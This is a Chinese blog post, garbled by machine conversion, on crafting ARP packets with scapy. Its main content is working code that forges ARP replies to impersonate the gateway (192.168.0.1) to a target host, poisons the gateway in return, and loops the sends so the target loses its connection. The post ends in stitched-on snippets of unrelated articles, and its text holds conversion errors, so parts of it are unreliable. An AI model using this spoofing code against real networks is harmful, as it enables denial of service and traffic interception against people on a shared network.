構造ARP包發包

2021-10-18 10:32:51 字數 1166 閱讀 8169

arp分為請求包以及響應包 opcode中的**表示請求以及響應

使用wireshark抓包可見,opcode為1可知這是乙個請求包

再來看看響應包,它的opcode為2

在使用scapy模組構造,arp應答包時,我們採用的是第二層發包(就是根據我們第二層中的封裝的幀頭來發包)

ptk2 = ether(

)/arp(

)#構造資料報

ptk2[arp]

.op =

2#設定為應答包

ptk2[arp]

.psrc =

'192.168.0.1'

#我們想要冒充的ip位址

ptk2[arp]

.pdst =

'192.168.0.107'

#我們想要傳送資料的ip位址

在我們沒有設定arp時我們 第二層目標位址mac預設為閘道器的位址

之後就是發包,sr 與 sr1都是在第三層發包,所以我們使用sr1發包時是沒有用的。使用的srp1(pkt)方法來發包

srp1(ptk2)
如果想要目標機器斷網,我們還得去使用上面的同樣的方法去欺騙閘道器

arpspoof_gateway = ether(

)/arp(

)arpspoof_gateway[arp]

.op =

2arpspoof_gateway[arp]

.psrc =

'192.168.0.107'

arpspoof_gateway[arp]

.pdst =

'192.168.0.1'

接著迴圈傳送達到欺騙的目的

arp = arp(

)arp[arp]

.op =

1arp[arp]

.pdst =

'192.168.0.107'

sr1(arp)

四種發包方式用法如下:

(1)只發不收

(2)發包且收包

(2)發包且收包

npm 發包 刪包

npm發包 刪包 第一步 註冊乙個npm賬號,第二步 新建乙個資料夾,內容為空,第三部 npm init y 一鍵生成乙個package.json檔案,第四步 新建乙個js檔案,moudle.exports丟擲乙個物件或者函式,裡邊寫上你的邏輯,第五步 開啟cmder,npm login登入賬號密碼...

UDP通訊寫包發包收包

void cmainframe senddata int cindex,cstring changeddata 點的個數和名字陣列if lobyte wsadata.wversion 1 hibyte wsadata.wversion 1 socket sockclient socket af in...

tell閘道器arp包正常嗎 ARP病毒攻擊原理

arp協議的缺陷 我們知道病毒往往都是通過網路協議的缺陷來開展攻擊,那麼arp協議的缺陷是什麼呢?arp協議是建立在信任區域網內所有節點的基礎上的,他的效率很高。但是不安全。它是無狀態的協議。他不會檢查自己是否發過請求包,也不知道自己是否發過請求包。他也不管是否合法的應答,只要收到目標mac位址是自...